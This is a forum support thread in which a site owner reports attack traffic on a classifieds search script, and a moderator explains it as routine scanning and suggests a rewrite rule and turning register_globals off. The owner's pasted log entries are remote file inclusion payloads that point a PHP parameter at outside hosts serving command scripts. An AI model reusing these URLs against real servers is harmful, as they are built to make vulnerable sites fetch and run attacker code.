Gossamer Forum
Home : Products : Gossamer Links : Discussions :

Remote attackers

Quote Reply
Remote attackers
Hello GT!

I think guys that you should make an update of GLinks as soon as possible because remote attackers makes me crazy. I suggest that you take a look on this web site for more information about what's going on.

Here are some examples of what they "search" on my website:

http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt//classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=vaccinated//classes/adodbt/sql.php?classes_dir=http://coyoteco.iespana.es/cmd.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt//classes/adodbt/sql.php?classes_dir=http://futurehousingsystems.com/images/string.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt/classes/adodbt/sql.php?classes_dir=http:/usuarios.arnet.com.ar/classes/adodbt/sql.php?classes_dir=http://www.cafesjakie.nl/images/sjakie/id.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt/classes/adodbt/sql.php?classes_dir=http:/usuarios.arnet.com.ar/larry123/classes/adodbt/sql.php?classes_dir=http://www.cafesjakie.nl/images/sjakie/id.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=príncipe
http://www.website.com/cgi-bin/classifieds/search.cgi?query=peña

etc. etc. ...

Crazy
Quote Reply
Re: [katakombe] Remote attackers In reply to
Hi,

The one thing I noticed as a trend, is they use:

sql.php

..in the query.

One thing you could do, is make a rewrite rule, that blocks sql.php queries from even getting to your site.

Something like:

Code:
RewriteEngine On
RewriteRule sql.php http://www.yoursite.com [L]

However there is no reason to really worry, as you're not going to be getting hacked by these queries :) (there is nothing GT could release to "fix" this problem, as its not related to their program, but simply you're server). You only really need to worry if you have register_globals set to on, in php.ini

Hope that eases your mind a bit :)

Cheers

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!
Quote Reply
Re: [Andy] Remote attackers In reply to
Hi Andy!

Thanks, but unfortunately your code:

Quote:
Code:
RewriteEngine On
RewriteRule sql.php http://www.yoursite.com [L]

not working .. Unsure

Quote:
You only really need to worry if you have register_globals set to on, in php.ini

Hmm .. Can you explain what you mean, please?

p.s.

This issue is really annoying Crazy
Quote Reply
Re: [katakombe] Remote attackers In reply to
Hi,

The formatting is right.

Personally, I think you would be better to ask your host, is they can stop people from even trying to access sql.php in ANY queries on your site.

Quote:
Hmm .. Can you explain what you mean, please?

Well, unless you are the system administrator, this won't mean much to you.

Basically, in your php.ini file, you need to change:

Code:
register_globals = On

..to@

Code:
register_globals = Off

However, your host would need to do this if you don't have access to the php.ini file (i.e you are on a managed/shared server)

Quote:
This issue is really annoying Crazy

I don't understand why its so annoying :/ We get these kind of requests on our server all the time (pretty much everyone does);
Quote:
64.232.131.130 - - [01/Feb/2006:12:33:07 -0800] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
195.132.21.123 - - [15/Feb/2006:09:27:38 -0800] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"

..its basically people trying to find "holes" in your server security , even if they don't exist Smile

Cheers

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!
Quote Reply
Re: [Andy] Remote attackers In reply to
Hi Andy!

Quote:
The formatting is right.

Yea, that's OK. I'll contact my hosting company ..

Thanks again Smile